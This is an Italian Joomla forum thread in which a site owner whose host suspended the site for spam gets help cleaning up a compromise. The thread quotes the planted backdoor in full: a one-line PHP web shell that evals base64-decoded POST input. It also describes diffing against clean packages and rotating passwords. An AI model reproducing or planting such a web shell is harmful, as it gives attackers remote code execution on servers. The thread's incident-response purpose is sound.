Spam inviato dal sito!

[sgot]

Ho questo urgente problema spero che possiate aiutarmi a risolverlo.

Il mio servizio di hosting mi ha (giustamente) sospeso il sito e l'accesso FTP a causa di un invio di spam da questo indirizzo:
[miosito]/components/com_weblinks/z3yksh.php

Nè online, nè qui sul forum ho trovato qualcosa al riguardo.

La versione di Joomla dovrebbe essere la più aggiornata (2.5.11).

Ho già aperto un ticket e mi hanno chiesto di risolverlo non appena mi riattiveranno l'accesso, altrimenti rischiano il ban dell'ip dell'intera macchina, il che non è cosa carina...
Potete immaginare che ho addosso una certa pressione.

Cosa posso fare? Potreste indirizzarmi in qualche modo?

[mau_develop]

ma quel file esiste?

[sgot]

Non lo so, non mi hanno ancora ripristinato l'accesso FTP 
Nel sito in locale, prima della pubblicazione, non c'era sicuramente...

[mau_develop]

dovrebbe esistere ed è da eliminare, e per eventuali backdoor sovrascrivi tutto con un pacchetto nuovo.
Dovresti fare anche (magari in locale) un filediff con un pacchetto nuovo, per scovare altri files simili.
Se hai estensioni aggiuntive vale lo stesso discorso

[sgot]

Ciao!
Sono ancora in attesa che mi riattivino i servizi per agire sul problema.

Dalla tua risposta suppongo che la semplice eliminazione del file incriminato potrebbe non risolvere radicalmente la cosa...nel senso che, da qualche parte ci sarò una chiamata a quel file, giusto? Come faccio a scoprire chi o cosa lo invoca?
In più se non pongo rimedi più approfonditi potrebbe accadere di nuovo, giusto?

Visto che è la prima volta che mi capita una cosa del genere, potresti consigliarmi come fare per evitarlo? Non so, cambiare le password, agire in qualche modo sui permessi...

Come funziona filediff? Per farlo dovrei prima scaricare il sito in locale?

Scusa la raffica di domande  ma ne ho veramente bisogno!


[EDIT]
Ho appena eliminato il file ma prima l'ho scaricato per vedere cosa conteneva...
if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}

Qualche idea sul da farsi?!?!

[mau_develop]

In testa alla sez trovi un post in evidenza e comunque tutti quelli di qs sezione hanno il medesimo tuo problema.

Il principio è (esempio):

- ho un sito J X.XX.XX

- Il pacchetto decompresso è così:
/administrator
/components
/components/pippo/
/components/pippo/pluto.php
Quindi 2 cartelle e una delle quali ha un ulteriore cartella con dentro pluto.php

a) attraverso una falla entrano nel sito e mettono una stringa in pluto.php
b) poi per rientrare più comodamente e rifarlo mi mettono un file /components/pippo/cattivo.php

- I casi che si possono verificare sono: a, b, a+b
caso a) Sovrascrivo con un pacchetto nuovo e sicuramente sovrascriverò pluto.php sanitizzandolo
caso b) Anche se sovrascrivo non succede nulla, J non ha quel file e quindi non lo tocca... scarico un tool che mi faccia un filediff (ne trovi tanti e free) metto sul desktop un pacchetto nuovo e il mio bucato e le differenze probabilmente saranno i files aggiunti dal nostro spammer (più quelli aggiunti da te in manuale ma qs li vediamo dopo (**))
caso a+b) devi fare entrambe le cose

siccome non sai mai cosa ha fatto ricadi sempre nel caso a+b

(**) Ovvio che nel tempo hai aggiunto cose... e quì paghi i backup che non hai fatto.
Devi ricrearti il più possibile una directory joomla affidabile da comparare quindi scaricarti oltre al pacchetto J stessa versione anche tutti i pacchetti estensioni della stessa versione e metterli manualmente nelle cartelle
Avanzeranno files e immagini da te inseriti... e quì devi per forza guardarli uno a uno a manina....

Non c'è scappatoia... se non un tool per Joomla che avevo visto in giro che faceva un po' di cose automaticamente, ma non ricordo nome e dove... e dubito che senza un controllo manuale sia affidabile

[sgot]

Credo di aver risolto il problema.

Ho seguito alla lettera ciò che mi hai detto...effettuato un'analisi approfondita comparando il mio ultimo backup in locale e il sito quello online.
C'erano 3 file PHP di troppo (aggiunti il 19 maggio, data in cui di certo io non ci ho lavorato), la cui combinazione permetteva di eseguire codice sul server.

In uno di questi file PHP c'era anche un IP, probabilmente per "autorizzare l'accesso" all'hacker.
Ora sarebbe da capire come abbia fatto ad accedere al nostro spazio web per piazzarci quei file...

Dici che è necessario cambiare tutte le password? (Pannello di amministrazione del sito, FTP, database, amministrazione di Joomla...)

Tu cosa consigli?

Intanto...un mega grazie!!

[mau_develop]

sono felice,... sei il primo che segue le indicazioni su 6400
Non ci metterei la vita sul fatto che tu abbia risolto perchè sono cose un po' complicatucce (anche per me) ma hai buone probabilità di esserci riuscito.
Magari fai subito un backup e una scansione della macchina con un av in modo da escludere sia tu stesso ad iniettare qualcosa.

Dare dei consigli di prevenzione generali è difficile, queste cose hanno spesso la complicità della configurazione della macchina se non è essa stessa fornitrice di vettori di attacco.

Per quanto riguarda joomla direi che la priorità è verso le "cose" che hai aggiunto, una verifica di affidabilità non sarebbe male.
Però non è nemmeno detto che non vi siano vulnerabilità in joomla per questo la cosa più sicura è sempre il backup
inoltre con un backup anche un po' datato il filediff lo fai in un attimo

----------------------------------------------
Dici che è necessario cambiare tutte le password? (Pannello di amministrazione del sito, FTP, database, amministrazione di Joomla...)
---------------------------------------------------
Sì, e verificare che non si sia aggiunto come utente con privilegi particolari